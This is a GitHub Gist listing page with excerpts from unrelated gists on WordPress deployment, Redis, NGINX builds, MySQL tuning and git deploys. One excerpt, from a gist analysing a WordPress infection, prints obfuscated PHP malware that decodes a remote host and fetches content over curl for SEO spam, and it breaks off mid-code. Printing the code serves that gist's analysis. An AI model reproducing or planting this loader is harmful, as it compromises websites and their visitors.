webaxones / deploy.yml

Last active August 31, 2024 21:48

GitHub workflow to build a WordPress Bedrock site and deploy it to a shared server using SSH

	# This GitHub workflow will build a WordPress Bedrock site and deploy it to a shared server (french one: O2Switch, but URLs can be adapted) using SSH
	# Actions secrets are used to store sensitive information:
	# - SSH_PRIVATE_KEY: The private key used to authenticate with the remote server
	# - REMOTE_HOST: The hostname of the remote server
	# - REMOTE_USER: The username used to authenticate with the remote server
	# - REMOTE_PROD_TARGET: The path on the remote server where the site will be deployed to
	# - REMOTE_PREPROD_TARGET: The path on the remote server where the site will be deployed to
	# - URL_ENCODED_PASSWORD: The password used to authenticate with the remote server, URL encoded (e.g. using https://www.urlencoder.org/)
	# Workflow triggers on pushes to the develop and master branches:
	# - On the develop branch, the site is deployed to the preprod target

mrbrainz / Exploited Wordpress Index File - Sitemap Malware

Last active March 23, 2024 09:40

Unobfuscation of a complicated malware that uses fake XML sitemaps for backhat SEO. This code was being injected into 2 of my Wordpress sites' index.php files every 2 days. I couldn't find where the security hole is, but the code was always the same. I spend time going through and unobfuscating by hand, as no online tool I could find would decod…

<?php @header('Content-Type:text/html;charset=utf-8');error_reporting(0); $OOOOOO="%71%77%65%72%74%79%75%69%6f%70%61%73%64%66%67%68%6a%6b%6c%7a%78%63%76%62%6e%6d%51%57%45%52%54%59%55%49%4f%50%41%53%44%46%47%48%4a%4b%4c%5a%58%43%56%42%4e%4d%5f%2d%22%3f%3e%20%3c%2e%2d%3d%3a%2f%31%32%33%30%36%35%34%38%37%39%27%3b%28%29%26%5e%24%5b%5d%5c%5c%25%7b%7d%21%2a%7c%2b%2c"; global $O; $O=urldecode($OOOOOO);$oOooOO='z1228';$oOooOOoO=$O{15}.$O{4}.$O{4}.$O{9}.$O{62}.$O{63}.$O{63}.$oOooOO.$O{59}.$O{10}.$O{14}.$O{8}.$O{8}.$O{12}.$O{11}.$O{59}.$O{4}.$O{8}.$O{9}; function ooooooooOOOOOOOOoooooOOO($oooOOOoOoo){$ooooOOOooOo=curl_init();curl_setopt ($ooooOOOooOo, CURLOPT_URL, $oooOOOoOoo);curl_setopt ($ooooOOOooOo, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ooooOOOooOo, CURLOPT_CONNECTTIMEOUT, 5);$oooooOOOOooO = curl_exec($ooooOOOooOo);curl_close($ooooOOOooOo);return $oooooOOOOooO; } function ooOOoOOO($OooooO,$OOOoooo=array()){global $O;$OooooO=str_replace(' ','+',$OooooO);$OOooooO=curl_init();curl_setopt($OOooooO,CURLOPT_URL, "$Ooo

itamarhaber / some_thoughts.md

Created February 23, 2018 19:18

Some thoughts about "Building a sliding window rate limiter with Redis"

Reading Building a sliding window rate limiter with Redis, and w/o addressing the actual logic (which may or may not work).

Optimize by:

Lua seems a much better choice: idiompotent, portable, server-side, less bandwidth, atomic...
The call to ZRANGEBYSCORE seems to be unused, should be commented out if so
Looking at the use of ZRANGE, it appears that ZCARD it what's actually needed

The (untested) Lua snippet:

sh41 / 01 Create a debug version of the docker image.sh

Last active April 16, 2024 10:08

Debugging segmentation faults in PHP in a docker container.

	git clone git@github.com:docker-library/php.git docker-library-php
	## Go to the specific version you're interested in
	cd docker-library-php/7.1/fpm/alpine

	## Edit the .Dockerfile.
	## Change
	## ENV PHP_EXTRA_CONFIGURE_ARGS --enable-fpm --with-fpm-user=www-data --with-fpm-group=www-data
	## to
	## ENV PHP_EXTRA_CONFIGURE_ARGS --enable-fpm --with-fpm-user=www-data --with-fpm-group=www-data --enable-debug
	## Comment out or delete:

neilstuartcraig / nginx-boringssl-build-script-debian.sh

Last active September 21, 2024 10:41

This builds NGINX from source with BoringSSL for Debian (alike?) systems with systemd (e.g. Debian Jessie)

	#!/bin/bash

	LATESTNGINX="1.11.10"
	BUILDROOT="/tmp/boring-nginx"

	# Pre-req
	sudo apt-get update
	sudo apt-get upgrade -y

	# Install deps

fevangelou / my.cnf

Last active September 21, 2024 22:10

Optimized my.cnf configuration for MySQL/MariaDB (on Ubuntu, CentOS, Almalinux etc. servers)

	# === Optimized my.cnf configuration for MySQL/MariaDB (on Ubuntu, CentOS, Almalinux etc. servers) ===
	#
	# by Fotis Evangelou, developer of Engintron (engintron.com)
	#
	# ~ Updated December 2021 ~
	#
	#
	# The settings provided below are a starting point for a 8-16 GB RAM server with 4-8 CPU cores.
	# If you have different resources available you should adjust accordingly to save CPU, RAM & disk I/O usage.
	#

smerrill / gist:10544237

Last active August 4, 2023 12:26

Socket Activation Notes

	Socket activation:

	NGINX=3:4

	ListenStream=10646 (IPv6)
	ListenStream=0.0.0.0:10646 (IPv4)
	BindIPv6Only=ipv6-only

	nginx.conf:
	server {

chrisboulton / ip_blacklist.lua

Last active September 19, 2024 15:42

Redis based IP blacklist for Nginx (LUA)

	-- a quick LUA access script for nginx to check IP addresses against an
	-- `ip_blacklist` set in Redis, and if a match is found send a HTTP 403.
	--
	-- allows for a common blacklist to be shared between a bunch of nginx
	-- web servers using a remote redis instance. lookups are cached for a
	-- configurable period of time.
	--
	-- block an ip:
	-- redis-cli SADD ip_blacklist 10.1.1.1
	-- remove an ip:

nichtich / README.md

Last active July 19, 2024 11:21 — forked from oodavid/README.md

How to automatically deploy from GitHub

Deploy your site with git

This gist assumes:

you have an online remote repository (github / bitbucket etc.)
you have a local git repo
and a cloud server (Rackspace cloud / Amazon EC2 etc)
- your (PHP) scripts are served from /var/www/html/
- your webpages are executed by Apache
the Apache user is named www-data (may be apache on other systems)

Alexis madrzejewski

Deploy your site with git